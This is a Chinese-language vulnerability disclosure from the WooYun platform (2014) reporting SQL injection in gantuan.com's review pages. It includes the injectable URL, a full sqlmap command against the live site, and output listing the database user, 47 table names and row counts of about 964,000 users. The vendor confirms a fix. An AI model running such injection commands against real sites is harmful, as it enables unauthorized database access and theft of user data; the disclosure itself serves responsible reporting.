漏洞详情

披露状态:

2014-04-01: 细节已通知厂商并且等待厂商处理中
2014-04-02: 厂商已经确认,细节仅向厂商公开
2014-04-12: 细节向核心白帽子及相关领域专家公开
2014-04-22: 细节向普通白帽子公开
2014-05-02: 细节向实习白帽子公开
2014-05-16: 细节向公众公开

简要描述:

伴随着阿飞西雅 "毕业旅行"中优雅的吉他声,我来了....

详细说明:

再次感谢某站的友情链接加快了我来到赶团的步伐。

#1 注入点

http://www.gantuan.com/review/5573.html  (URL重写~)



#2 run...

sqlmap.py -u "http://www.gantuan.com/review/5573*.html" --dbms="mysql" --time-sec=6 --current-user --current-db --charset=GBK"

sql_1.png

漏洞证明:

读表

current user:    'gantuan@localhost'
Database: gantuan
[47 tables]
+---------------------------------------+
| order |
| user |
| address |
| ask |
| card |
| category |
| code |
| coupon |
| coupon2 |
| cpd_count |
| cpd_sign |
| fav |
| feedback |
| flow |
| friendlink |
| invite |
| logger_admin |
| logo |
| lym |
| matters |
| news |
| order_count |
| package |
| page |
| partner |
| pay |
| region |
| review |
| smssubscribe |
| special |
| special_models |
| subscribe |
| system |
| team |
| team_combina |
| team_stock |
| team_style |
| team_style_term |
| teamtag |
| topic |
| tuan_navs |
| tuan_type_tip |
| vote_feedback_input |
| vote_feedback_question |
| vote_options |
| vote_question |
| weibo_coupon |
+---------------------------------------+

Database: information_schema
[28 tables]
+---------------------------------------+
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
...略



顺便count了下gantuan库

Database: gantuan
+------------------------+---------+
| Table | Entries |
+------------------------+---------+
| `user` | 964453 |
| card | 512338 |
| cpd_count | 504575 |
| `order` | 467637 |
| subscribe | 446995 |
| pay | 382986 |
...略

sql_2.png



以上仅为测试,未带走丝毫数据。

修复方案:

礼物什么先不说,赶紧弹起手中的键盘火速修复吧:)

版权声明:转载请注明来源 Comer@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2014-04-02 00:51

厂商回复:

已核实确实存在此问题,现已经修复!非常感谢您对赶团网的安全做出贡献!

最新状态:

暂无


漏洞评价: